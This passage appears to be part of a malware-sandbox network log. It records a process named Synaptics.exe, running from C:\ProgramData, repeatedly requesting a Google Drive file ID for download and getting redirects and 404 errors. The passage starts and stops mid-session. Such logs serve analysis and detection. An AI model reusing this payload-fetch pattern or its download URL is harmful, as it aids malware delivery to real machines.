                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:35 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:35 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="q3ucf8aNp-E5DAsZGtCuKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:35 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    19 | 192.168.2.11 | 49820 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:34 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5OwXIxM5mtlSthRzAlR4bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    20 | 192.168.2.11 | 49828 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:35 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-RN0RaN8EMVPsAxRlbclgdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    21 | 192.168.2.11 | 49829 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:36 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QjZ9vTNUMxcDEnqFzAVN_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    22 | 192.168.2.11 | 49830 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:36 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5AFEGbacIzpSAULCoPQkw8rQlP8j00jsK0afAf7paQz2DH7_4vaUPD3x2y83op_4BP
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:36 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JnKr9rVpi7N8UzYKecQyFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:36 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:36 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="gcTGRowsu-vayc_cYM2gcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:36 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    23 | 192.168.2.11 | 49831 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:36 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6F5WUlqGPCruTCsSnHqN7pRQmYRRKqHFApds3eZOlrduui5CHpVseprB0EFMJGzi46
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:36 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZvOTkauHlWm1dBpuMdT5Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:36 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-07 12:18:36 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="0o3wa1GgXZ-ycUIFiIX5Tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-07 12:18:36 UTC  115                IN         Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
24          192.168.2.11  49840        142.250.185.110  443               2260  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-07 12:18:36 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:37 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JYHIbphfk5VDWu8dTd-n6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
25          192.168.2.11  49841        142.250.185.110  443               2260  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-07 12:18:36 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:37 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QzjP1sO6S6Mp2ngDV4xang' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
26          192.168.2.11  49842        142.250.186.161  443               2260  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-07 12:18:36 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
2025-01-07 12:18:37 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6fjW79sMfd1HlUfT-MEXFhe4qPQ27GWsVwFOoxyb5FqGrulKmtpHxCkk2oCpEg4dMF5DRsOmM
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Ct9D7YgvO5V7GKRak1rSAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:37 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-07 12:18:37 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="7otxik4TQ8eCCtzUsy4iPA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-07 12:18:37 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
27          192.168.2.11  49843        142.250.186.161  443               2260  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-07 12:18:36 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
2025-01-07 12:18:37 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7jhPuA0J95js8FDmgC7duCyXj-lWiC5Ip5lkvfsF-1xpoMkD_qoKNHuBipEvY4hPp3
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uzHOJLaF6rlpMxcTIFlrSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:37 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-07 12:18:37 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="O_DWKuNVL--_ESc8oP3Uuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-07 12:18:37 UTC  115                IN         Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
28          192.168.2.11  49856        142.250.186.161  443               2260  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-07 12:18:38 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:38 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7_oTww3mIe1EfNf3TQ-8zcPJ3aQ-KG6Naed04EJUjPoAUj2AYR35vdqpJdmI4IVvGm
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:38 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zUCoA0qSCHe1Z6UOQmmlMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:38 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:38 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="kJ7wD94x3FBame4LCSsTZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:38 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    29 | 192.168.2.11 | 49858 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
